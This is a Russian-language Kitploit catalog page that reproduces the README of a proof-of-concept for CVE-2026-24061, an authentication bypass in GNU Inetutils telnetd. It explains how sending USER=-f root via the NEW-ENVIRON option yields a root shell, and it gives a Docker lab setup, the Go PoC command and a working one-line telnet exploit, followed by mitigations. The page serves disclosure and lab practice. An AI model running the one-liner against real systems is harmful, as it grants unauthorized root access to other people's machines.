Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-24061 — PoC-эксплойт для обхода аутентификации в telnetd из GNU Inetutils (CVE-2026-24061) с настройкой Docker-лаборатории и PoC на Go. Использует опцию NEW-ENVIRON для получения root-оболочки. | Kitploit
Инструменты/GitHubGitHub/chocapikk/cve-2026-24061
Аутентификация и авторизацияАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubchocapikk/cve-2026-24061

CVE-2026-24061

PoC-эксплойт для обхода аутентификации в telnetd из GNU Inetutils (CVE-2026-24061) с настройкой Docker-лаборатории и PoC на Go. Использует опцию NEW-ENVIRON для получения root-оболочки.

Репозиторий
1237 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-24061

GNU Inetutils telnetd: удалённый обход аутентификации

Серьёзно, telnet в 2026-м? Ну ребят, пора двигаться дальше. SSH существует с 1995 года. 🤦

Описание

Критическая уязвимость обхода аутентификации в GNU Inetutils telnetd, затрагивающая версии с 1.9.3 по 2.7.

Уязвимость использует опцию NEW-ENVIRON протокола telnet для внедрения вредоносных аргументов в login(1). Устанавливая USER=-f root через протокол telnet, злоумышленник может обойти аутентификацию и получить root-оболочку без учётных данных.

Затронутые версии

  • GNU Inetutils 1.9.3 - 2.7

Технические детали

Протокол telnet поддерживает опцию NEW-ENVIRON (RFC 1572), которая позволяет клиенту отправлять переменные окружения серверу. Демон telnetd передаёт переменную USER в login(1) в качестве аргумента.

При отправке USER=-f root значение интерпретируется как:

  • Флаг -f: пропуск аутентификации (доверенный хост)
  • root: целевой пользователь

Это приводит к выполнению login -f root, что даёт немедленный root-доступ.

PoC определяет успешную эксплуатацию по наличию IAC WILL ECHO (0xff 0xfb 0x01) - сигнала протокола, который сервер отправляет при предоставлении доступа к оболочке.

Лабораторная настройка

root@kitploit:~
# Build and run the vulnerable telnetd container
docker compose up --build -d

# Test the exploit
go run poc.go 127.0.0.1 2323

Эксплуатация

root@kitploit:~
# Using the Go PoC (with interactive shell)
go run poc.go <target> <port>

# Simple PoC using standard telnet client
env USER='-f root' telnet -a <target> <port>

Меры по смягчению

  • Хватит использовать telnet в 2026-м, серьёзно 🙏
  • Используйте вместо него SSH (он существует уже 31 год, меня в 95-м даже ещё не было, лол)
  • Обновитесь до исправленной версии GNU Inetutils
  • Ограничьте доступ к telnet с помощью правил файрвола

Файлы

  • poc.go — эксплойт на Go с интерактивной оболочкой
  • Dockerfile — контейнер с уязвимым telnetd
  • docker-compose.yml — оркестрация лабораторной среды

Ссылки

  • Уведомление: https://www.openwall.com/lists/oss-security/2026/01/20/2
  • GNU Inetutils: https://www.gnu.org/software/inetutils/
  • RFC 1572 (NEW-ENVIRON): https://tools.ietf.org/html/rfc1572

Авторы

  • LeakIX Research Team
Скачать инструмент